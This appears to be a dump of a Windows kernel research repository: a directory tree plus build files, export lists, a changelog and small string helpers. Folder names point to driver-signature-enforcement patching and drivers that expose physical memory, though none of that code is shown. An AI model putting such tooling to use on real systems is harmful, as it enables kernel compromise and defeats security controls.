├── source
├── WormholeDrivers
│ ├── MAPMEM
│ │ ├── DIRS
│ │ ├── SYS
│ │ │ ├── SOURCES
│ │ │ ├── MAPMEM.INI
│ │ │ ├── MAKEFILE
│ │ │ └── MAPMEM.H
│ │ ├── EXE
│ │ │ ├── SOURCES
│ │ │ ├── MAKEFILE
│ │ │ └── MAPTEST.MAK
│ │ └── README.TXT
│ ├── PHYMEM
│ │ ├── LICENSE
│ │ ├── LICENSE.html
│ │ ├── PCIFlt
│ │ │ ├── DebugPrint.c
│ │ │ ├── DebugPrint.h
│ │ │ ├── Release
│ │ │ │ ├── PCIFlt.sys
│ │ │ │ └── PCIFilter.inf
│ │ │ ├── PCIFlt.dsw
│ │ │ └── PCIFilter.h
│ │ └── PhyMem
│ │ │ ├── test
│ │ │ ├── pmdll.lib
│ │ │ ├── test.dsw
│ │ │ ├── test.cpp
│ │ │ └── pmdll.h
│ │ │ ├── driver
│ │ │ ├── DebugPrint.c
│ │ │ ├── DebugPrint.h
│ │ │ ├── phymem.dsw
│ │ │ ├── phymem.h
│ │ │ └── AccessBus.c
│ │ │ └── pmdll
│ │ │ ├── Release
│ │ │ └── pmdll.lib
│ │ │ ├── pmdll.dsw
│ │ │ ├── pmdll.h
│ │ │ └── phymem.h
│ ├── WINRING0
│ │ ├── dll
│ │ │ ├── OlsDll.rc
│ │ │ ├── sys
│ │ │ │ ├── SOURCES
│ │ │ │ ├── MAKEFILE
│ │ │ │ └── OpenLibSys.rc
│ │ │ ├── vxd
│ │ │ │ ├── OpenLS.def
│ │ │ │ ├── OpenLS.rc
│ │ │ │ ├── ctrl.asm
│ │ │ │ └── Makefile
│ │ │ ├── stdafx.cpp
│ │ │ ├── resource.h
│ │ │ ├── Driver.h
│ │ │ ├── stdafx.h
│ │ │ ├── OlsApi.def
│ │ │ ├── OlsDll.h
│ │ │ └── OlsDef.h
│ │ └── README.md
│ ├── WINIO
│ │ ├── Source
│ │ │ ├── Dll
│ │ │ │ ├── WinIo.aps
│ │ │ │ ├── WinIo.rc
│ │ │ │ ├── WinIo.suo
│ │ │ │ ├── Phys32.h
│ │ │ │ ├── WinIo.def
│ │ │ │ ├── resource.h
│ │ │ │ ├── Port32.h
│ │ │ │ ├── winio.h
│ │ │ │ ├── WinIo.sln
│ │ │ │ └── Phys32.cpp
│ │ │ └── Drv
│ │ │ │ ├── SOURCES
│ │ │ │ ├── MAKEFILE
│ │ │ │ └── winio_nt.h
│ │ ├── Samples
│ │ │ ├── DumpPhys
│ │ │ │ ├── DumpPhys.suo
│ │ │ │ ├── DumpPhys
│ │ │ │ │ ├── Properties
│ │ │ │ │ │ ├── Settings.settings
│ │ │ │ │ │ ├── Settings.Designer.cs
│ │ │ │ │ │ └── AssemblyInfo.cs
│ │ │ │ │ ├── DumpPhys.manifest
│ │ │ │ │ └── Program.cs
│ │ │ │ └── DumpPhys.sln
│ │ │ └── DumpPort
│ │ │ │ ├── DumpPort.suo
│ │ │ │ ├── DumpPort
│ │ │ │ ├── Properties
│ │ │ │ │ ├── Settings.settings
│ │ │ │ │ ├── Settings.Designer.cs
│ │ │ │ │ └── AssemblyInfo.cs
│ │ │ │ ├── DumpPort.manifest
│ │ │ │ └── Program.cs
│ │ │ │ └── DumpPort.sln
│ │ └── .gitignore
│ ├── INPOUT
│ │ ├── MAKEFILE
│ │ ├── SOURCES
│ │ ├── HWInterfaceDrv.sln
│ │ ├── hwinterfacedrv.rc
│ │ ├── hwinterfacedrv.h
│ │ ├── ReadMe.txt
│ │ └── license.txt
│ └── readme.txt
├── AMSI
│ ├── AmsiProviderATL
│ │ ├── AmsiServer
│ │ │ ├── AmsiScan
│ │ │ │ ├── AmsiScan.rgs
│ │ │ │ ├── AmsiScan.rc
│ │ │ │ ├── AmsiScanps.def
│ │ │ │ ├── AmsiScan.vcxproj.user
│ │ │ │ ├── stdafx.cpp
│ │ │ │ ├── AmsiScan.def
│ │ │ │ ├── targetver.h
│ │ │ │ ├── dllmain.h
│ │ │ │ ├── dllmain.cpp
│ │ │ │ ├── AmsiProvider.rgs
│ │ │ │ ├── resource.h
│ │ │ │ ├── stdafx.h
│ │ │ │ ├── AmsiScan.idl
│ │ │ │ ├── dlldata.c
│ │ │ │ ├── AmsiScan.cpp
│ │ │ │ ├── AmsiProvider.h
│ │ │ │ ├── AmsiScan_i.c
│ │ │ │ └── AmsiScan.vcxproj.filters
│ │ │ └── AmsiScanPS
│ │ │ │ ├── AmsiScanPS.vcxproj.user
│ │ │ │ └── AmsiScanPS.vcxproj.filters
│ │ ├── AmsiClient
│ │ │ ├── AmsiClient.vcxproj.user
│ │ │ ├── pch.cpp
│ │ │ ├── pch.h
│ │ │ ├── AmsiClient.vcxproj.filters
│ │ │ └── AmsiClient.cpp
│ │ └── AmsiScan.sln
│ └── AmsiProviderC
│ │ ├── AmsiProviderServer
│ │ ├── exports.def
│ │ ├── AmsiProviderServer.vcxproj.user
│ │ ├── minirtl
│ │ │ ├── _strend.c
│ │ │ ├── _strlen.c
│ │ │ ├── _strcat.c
│ │ │ ├── _strcpy.c
│ │ │ ├── ultohex.c
│ │ │ ├── u64tohex.c
│ │ │ └── rtltypes.h
│ │ ├── global.h
│ │ ├── classfactory.h
│ │ └── AmsiProviderServer.vcxproj.filters
│ │ └── AmsiProviderServer.sln
├── DrvTools
│ ├── readme.txt
│ └── src
│ │ ├── DrvTools.ico
│ │ ├── DrvTools.res
│ │ ├── rsrc
│ │ ├── main.ico
│ │ └── about64.ico
│ │ ├── DrvTools.lpr
│ │ └── ppas.bat
├── IntelNal
│ ├── README.md
│ ├── Kconfig
│ ├── Makefile
│ ├── src
│ │ ├── iqvlinux.spec
│ │ └── nalinstall
│ └── inc
│ │ └── linux
│ │ └── linuxdriverdevice_i.h
├── ApiSetSchema
│ ├── Resource.rc
│ ├── icon_gears.ico
│ ├── ApiSetSchemaView.vcxproj.user
│ ├── minirtl
│ │ ├── _strend.c
│ │ ├── _strlen.c
│ │ ├── _strcat.c
│ │ ├── _strcpy.c
│ │ ├── ultostr.c
│ │ ├── _strcmpi.c
│ │ ├── _strncpy.c
│ │ ├── rtltypes.h
│ │ ├── _strncmpi.c
│ │ └── _strstr.c
│ ├── resource.h
│ ├── ApiSetSchemaView.sln
│ └── 1.manifest
├── ROS
│ ├── win32u
│ │ ├── win32u
│ │ │ ├── ver.rc
│ │ │ ├── win32u.vcxproj.user
│ │ │ ├── resource.h
│ │ │ ├── win32u.vcxproj.filters
│ │ │ ├── main.c
│ │ │ ├── w32parguments.h
│ │ │ └── w32parguments_checked.h
│ │ └── win32u.sln
│ └── srvany2
│ │ ├── srvany2
│ │ ├── minirtl
│ │ │ ├── _strlen.c
│ │ │ ├── _strcat.c
│ │ │ ├── _strcpy.c
│ │ │ ├── cmdline.h
│ │ │ └── rtltypes.h
│ │ ├── srvany2.vcxproj.user
│ │ └── srvany2.vcxproj.filters
│ │ └── srvany2.sln
├── DSEPatch
│ ├── DSEPatch
│ │ ├── resource.rc
│ │ ├── minirtl
│ │ │ ├── _strend.c
│ │ │ ├── _strlen.c
│ │ │ ├── _strcat.c
│ │ │ ├── _strcpy.c
│ │ │ ├── ultohex.c
│ │ │ ├── ultostr.c
│ │ │ ├── _strcmp.c
│ │ │ ├── u64tohex.c
│ │ │ ├── u64tostr.c
│ │ │ ├── _strcmpi.c
│ │ │ ├── _strncpy.c
│ │ │ ├── cmdline.h
│ │ │ ├── _strncmp.c
│ │ │ ├── rtltypes.h
│ │ │ └── _strncmpi.c
│ │ ├── resource.h
│ │ ├── DSEPatch.vcxproj.user
│ │ ├── cui
│ │ │ └── cui.h
│ │ ├── instdrv.h
│ │ ├── global.h
│ │ ├── se_patterns.h
│ │ ├── hde
│ │ │ └── pstdint.h
│ │ └── sup.h
│ ├── changelog.txt
│ ├── DSEPatch.sln
│ └── README.md
├── wdextract
│ ├── wdextract
│ │ ├── zlibwapi.lib
│ │ ├── pch.cpp
│ │ ├── pch.h
│ │ ├── wdextract.vcxproj.user
│ │ └── wdextract.vcxproj.filters
│ ├── README.md
│ └── wdextract.sln
├── StripDebug
│ ├── minirtl
│ │ ├── _strlen.c
│ │ ├── _strcat.c
│ │ ├── _strcpy.c
│ │ ├── cmdline.h
│ │ └── rtltypes.h
│ ├── StripDebug.vcxproj.user
│ ├── StripDebug.sln
│ ├── global.h
│ ├── cui.h
│ └── StripDebug.vcxproj.filters
├── NtCall64_LogParser
│ ├── NtCall64_LogParser.vcxproj.user
│ ├── NtCall64_LogParser.vcxproj.filters
│ ├── NtCall64_LogParser.sln
│ └── NtCall64_LogParser.cpp
└── SecTrash
│ ├── readme.txt
│ ├── maxproc64.c
│ ├── secureaplus.c
│ ├── superantispyware.c
│ ├── asusgio2.c
│ └── iobitcallbacks.c
├── LICENSE
└── README.md
/source/WormholeDrivers/MAPMEM/DIRS:
--------------------------------------------------------------------------------
1 | DIRS=exe \
2 | sys
3 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rgs:
--------------------------------------------------------------------------------
1 | HKCR
2 | {
3 | }
4 |
--------------------------------------------------------------------------------
/source/DrvTools/readme.txt:
--------------------------------------------------------------------------------
1 | DrvTools 1.0.2303
2 | Build with Lazarus FPC v3.2.2
3 |
--------------------------------------------------------------------------------
/source/IntelNal/README.md:
--------------------------------------------------------------------------------
1 | Intel QV Linux kernel driver, see COPYING for more info
2 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/Resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/ApiSetSchema/Resource.rc
--------------------------------------------------------------------------------
/source/DrvTools/src/DrvTools.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/DrvTools.ico
--------------------------------------------------------------------------------
/source/DrvTools/src/DrvTools.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/DrvTools.res
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/ver.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/ROS/win32u/win32u/ver.rc
--------------------------------------------------------------------------------
/source/ApiSetSchema/icon_gears.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/ApiSetSchema/icon_gears.ico
--------------------------------------------------------------------------------
/source/DrvTools/src/rsrc/main.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/rsrc/main.ico
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DSEPatch/DSEPatch/resource.rc
--------------------------------------------------------------------------------
/source/DrvTools/src/rsrc/about64.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/DrvTools/src/rsrc/about64.ico
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/LICENSE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/LICENSE
--------------------------------------------------------------------------------
/source/wdextract/wdextract/zlibwapi.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/wdextract/wdextract/zlibwapi.lib
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/LICENSE.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/LICENSE.html
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/SOURCES:
--------------------------------------------------------------------------------
1 | TARGETNAME=mapmem
2 | TARGETPATH=$(BASEDIR)\lib
3 | TARGETTYPE=DRIVER
4 |
5 | SOURCES=mapmem.c
6 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsDll.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINRING0/dll/OlsDll.rc
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Drv/SOURCES:
--------------------------------------------------------------------------------
1 | TARGETNAME=WinIo
2 | TARGETPATH=.
3 | TARGETTYPE=DRIVER
4 | NTDEBUG=ntsd
5 |
6 | SOURCES= winio.c
7 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hfiref0x/Misc/HEAD/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/sys/SOURCES:
--------------------------------------------------------------------------------
1 | TARGETNAME=WinRing0
2 | TARGETPATH=lib
3 | TARGETTYPE=DRIVER
4 |
5 | INCLUDES=..\
6 |
7 | SOURCES=OpenLibSys.c OpenLibSys.rc
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/Phys32.h:
--------------------------------------------------------------------------------
#ifndef PHYS32_H
#define PHYS32_H

// Function pointer declared here and defined elsewhere. It takes a service
// identifier and two values named after the EAX and ECX registers, and
// returns a DWORD.
// NOTE(review): presumably the Win9x VxD service entry point resolved at
// run time; confirm against Phys32.cpp and check it for null before use.
extern DWORD (WINAPI *VxDCall)(DWORD Service, DWORD EAX_Reg, DWORD ECX_Reg);

#endif
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/win32u.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/exports.def:
--------------------------------------------------------------------------------
1 |
2 | LIBRARY
3 |
4 | EXPORTS
5 | DllGetClassObject PRIVATE
6 | DllCanUnloadNow PRIVATE
7 | DllRegisterServer PRIVATE
8 | DllUnregisterServer PRIVATE
9 |
--------------------------------------------------------------------------------
/source/IntelNal/Kconfig:
--------------------------------------------------------------------------------
1 | config INTEL_IQVANDROID
2 | tristate "iqvandroid kernel driver for BYT MFG tools"
3 | default n
4 | help
5 | Select this module to support BYT MFG tools.
6 |
7 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScanps.def:
--------------------------------------------------------------------------------
1 |
2 | LIBRARY
3 |
4 | EXPORTS
5 | DllGetClassObject PRIVATE
6 | DllCanUnloadNow PRIVATE
7 | DllRegisterServer PRIVATE
8 | DllUnregisterServer PRIVATE
9 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/EXE/SOURCES:
--------------------------------------------------------------------------------
1 |
2 | TARGETNAME=maptest
3 | TARGETPATH=$(BASEDIR)\lib
4 | TARGETTYPE=PROGRAM
5 |
6 | INCLUDES=..\sys;$(BASEDIR)\src\video\inc
7 |
8 | SOURCES=maptest.c
9 |
10 | UMTYPE=console
11 | UMBASE=0x100000
12 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/MAPMEM.INI:
--------------------------------------------------------------------------------
1 | \registry\machine\system\currentcontrolset\services\MapMem
2 | Type = REG_DWORD 0x00000001
3 | Start = REG_DWORD 0x00000003
4 | Group = Extended base
5 | ErrorControl = REG_DWORD 0x00000001
6 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 | InitializeWinIo
3 | ShutdownWinIo
4 | MapPhysToLin
5 | UnmapPhysicalMemory
6 | GetPhysLong
7 | SetPhysLong
8 | GetPortVal
9 | SetPortVal
10 | InstallWinIoDriver
11 | RemoveWinIoDriver
12 |
--------------------------------------------------------------------------------
/source/wdextract/wdextract/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed
2 |
3 | #include "pch.h"
4 |
5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers.
6 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/OpenLS.def:
--------------------------------------------------------------------------------
1 | VXD OPENLS DYNAMIC
2 |
3 | DESCRIPTION 'OPENLS VXD'
4 |
5 | SEGMENTS
6 | _LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
7 | _LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
8 | EXPORTS
9 | OPENLS_DDB @1
10 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed
2 |
3 | #include "pch.h"
4 |
5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers.
6 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // AmsiScan.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/ApiSetSchemaView.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | false
5 |
6 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.def:
--------------------------------------------------------------------------------
1 | ; AmsiScan.def : Declares the module parameters.
2 |
3 | LIBRARY
4 |
5 | EXPORTS
6 | DllCanUnloadNow PRIVATE
7 | DllGetClassObject PRIVATE
8 | DllRegisterServer PRIVATE
9 | DllUnregisterServer PRIVATE
10 | DllInstall PRIVATE
11 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/EXE/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/SYS/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Drv/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/sys/MAKEFILE:
--------------------------------------------------------------------------------
1 | #
2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
3 | # file to this component. This file merely indirects to the real make file
4 | # that is shared by all the driver components of the Windows NT DDK
5 | #
6 |
7 | !INCLUDE $(NTMAKEENV)\makefile.def
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/source/DSEPatch/changelog.txt:
--------------------------------------------------------------------------------
1 | 1.0.1 02 Aug 2016
2 | Initial release
3 |
4 | 1.0.2 14 Apr 2017
5 | Added offsets for RS2, rtls update
6 |
7 | 1.0.3 11 Oct 2017
8 | Added offsets for RS3
9 |
10 | 1.0.4 01 May 2018
11 | Added offset for RS4
12 |
13 | 1.0.5 22 Jan 2019
14 | Added offset for RS5, recreated in vs17 and rearranged, rtls update, made it public
15 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/EXE/MAPTEST.MAK:
--------------------------------------------------------------------------------
1 | # Nmake macros for building Windows 32-Bit apps
2 |
3 | !include
4 |
5 | all: maptest.exe
6 |
7 | maptest.obj: maptest.c
8 | $(cc) $(cflags) $(cvars) $(cdebug) -I..\sys maptest.c
9 |
10 | maptest.exe: maptest.obj
11 | $(link) $(linkdebug) $(conflags) -out:maptest.exe maptest.obj $(conlibs)
12 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/README.md:
--------------------------------------------------------------------------------
1 | # WinRing0
2 | Windows Ring0 Access
3 |
4 | ### File Directory
5 |
6 | >dll
7 | * driver source
8 |
9 | >drv
10 | * driver normal interface
11 |
12 | ## Description
13 | Allows a user-mode application to access ring 0 (kernel-level) resources:
14 |
15 | * access CPU MSR registers
16 | * read/write memory directly
17 | * perform I/O on PCI devices
18 | * etc...
19 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strend.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Locate the terminating NUL of a narrow string.
 *
 * Returns a pointer to the NUL byte that ends s, or 0 when s is a null
 * pointer. The scan has no length bound, so the caller must guarantee
 * that s is NUL-terminated. The result drops the const qualifier of the
 * input; writing through it is only valid if the buffer is writable.
 */
char *_strend_a(const char *s)
{
    const char *end = s;

    if (end != 0) {
        while (*end != 0)
            ++end;
    }

    return (char *)end;
}
13 |
/*
 * Locate the terminating NUL of a wide string.
 *
 * Returns a pointer to the wide NUL that ends s, or 0 when s is a null
 * pointer. The scan has no length bound, so the caller must guarantee
 * that s is NUL-terminated. The result drops the const qualifier of the
 * input; writing through it is only valid if the buffer is writable.
 */
wchar_t *_strend_w(const wchar_t *s)
{
    const wchar_t *end = s;

    if (end != 0) {
        while (*end != 0)
            ++end;
    }

    return (wchar_t *)end;
}
24 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strend.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Find the end of a narrow string.
 *
 * Walks s until the NUL terminator and returns its address; a null s
 * yields 0. There is no upper bound on the walk, so an unterminated
 * buffer is read past its end. The returned pointer is non-const even
 * though the argument is const.
 */
char *_strend_a(const char *s)
{
    const char *tail;

    if (!s)
        return 0;

    for (tail = s; *tail; tail++)
        ;

    return (char *)tail;
}
13 |
/*
 * Find the end of a wide string.
 *
 * Walks s until the wide NUL terminator and returns its address; a null
 * s yields 0. There is no upper bound on the walk, so an unterminated
 * buffer is read past its end. The returned pointer is non-const even
 * though the argument is const.
 */
wchar_t *_strend_w(const wchar_t *s)
{
    const wchar_t *tail;

    if (!s)
        return 0;

    for (tail = s; *tail; tail++)
        ;

    return (wchar_t *)tail;
}
24 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.h:
--------------------------------------------------------------------------------
1 | // dllmain.h : Declaration of module class.
2 |
// ATL DLL module class for this component; it derives from
// ATL::CAtlDllModuleT specialised on itself.
class CAmsiScanModule : public ATL::CAtlDllModuleT< CAmsiScanModule >
{
public :
    // Names LIBID_AmsiScanLib as the library ID of this module.
    DECLARE_LIBID(LIBID_AmsiScanLib)
    // Pairs the registry resource IDR_AMSISCAN with the AppID GUID given
    // as a string literal.
    DECLARE_REGISTRY_APPID_RESOURCEID(IDR_AMSISCAN, "{508c88ef-ca97-4107-a022-6025892ef192}")
};

// Declaration only: the module object itself is defined in another
// translation unit.
extern class CAmsiScanModule _AtlModule;
11 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strend.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Return the address of the NUL terminator of the narrow string s.
 *
 * A null s returns 0. The loop stops only at a NUL byte, so s must be
 * NUL-terminated by the caller. The const qualifier of the argument is
 * cast away in the return value.
 */
char *_strend_a(const char *s)
{
    if (s == 0)
        return 0;

    for (;;) {
        if (*s == 0)
            break;
        s++;
    }

    return (char *)s;
}
13 |
/*
 * Return the address of the NUL terminator of the wide string s.
 *
 * A null s returns 0. The loop stops only at a wide NUL, so s must be
 * NUL-terminated by the caller. The const qualifier of the argument is
 * cast away in the return value.
 */
wchar_t *_strend_w(const wchar_t *s)
{
    if (s == 0)
        return 0;

    for (;;) {
        if (*s == 0)
            break;
        s++;
    }

    return (wchar_t *)s;
}
24 |
--------------------------------------------------------------------------------
